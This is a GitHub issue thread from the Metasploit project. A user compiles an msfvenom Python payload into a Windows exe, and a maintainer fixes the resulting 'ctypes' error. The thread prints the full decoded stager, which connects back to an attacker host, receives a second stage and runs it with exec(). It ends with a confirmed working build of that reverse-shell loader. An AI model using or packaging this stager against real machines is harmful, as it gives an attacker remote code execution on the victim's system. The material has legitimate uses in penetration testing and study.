### ISSUE TITLE
To exe compiled python payload runs with error

### ISSUE THREAD

**Issue by theunknownport** [rapid7/metasploit-framework#13169]
## Steps to reproduce

1. Created python payload with msf venom
2. encrypted the payload with base64
3. converted the encrypted payload to an exe on my windows machine
4. run listener and run the compiled file

## Expected behavior

If i open the exe the session should pop up in metasploit and don't close again.

## Current behavior

The exe opens and closes with the message "failed to run script xyz"

Then I ran the exe in the windows terminal and got this error: 

```
Traceback (most recent call last):
  File "xyz.py", line 1, in <module>
  File "<string>", line 2, in <module>
  File "<string>", line 13, in <module>
  File "<string>", line 187, in <module>
NameError: name 'ctypes' is not defined
[4364] Failed to execute script xyz
```

This was useless so i tried to get a better understanding of the error. I found out that the original payload was already base64 encrypted and decrypted it. This got me the original python code:

```
import socket
import struct
import time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('myhost',myport))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(d,{'s':s})
```
So i compiled this one and got this error:

```
Traceback (most recent call last):
  File "connect.py", line 15, in <module>
    exec(d,{'s':s})
  File "<string>", line 187, in <module>
NameError: name 'ctypes' is not defined
[20072] Failed to execute script xyzRAW

```

The python file runs without problems, if i open it a cmd window opens so does the session. If i close the cmd window then the session closes (as expected)

##Summary

Thank you for helping, I'm glad if someone knows what's going on. I'm still a real beginner in python sorry if I did something wrong, I'm still at rookie level, its my first time opening an issue (;

**Comment by tekwizz123** [comment]
@theunknownport  In both cases you have the following error:

`NameError: name 'ctypes' is not defined`

Have you tried updating the Python file to use `from ctypes import *` ? That might help the script find out where the definitions for functions like `exec()` are and would likely solve at least some of the issues the script is having at the moment.

**Comment by theunknownport** [comment]
> @theunknownport In both cases you have the following error:
> 
> `NameError: name 'ctypes' is not defined`
> 
> Have you tried updating the Python file to use `from ctypes import *` ? That might help the script find out where the definitions for functions like `exec()` are and would likely solve at least some of the issues the script is having at the moment.

Thx man worked (:

**Comment by tekwizz123** [comment]
@theunknownport No problem, glad it worked!
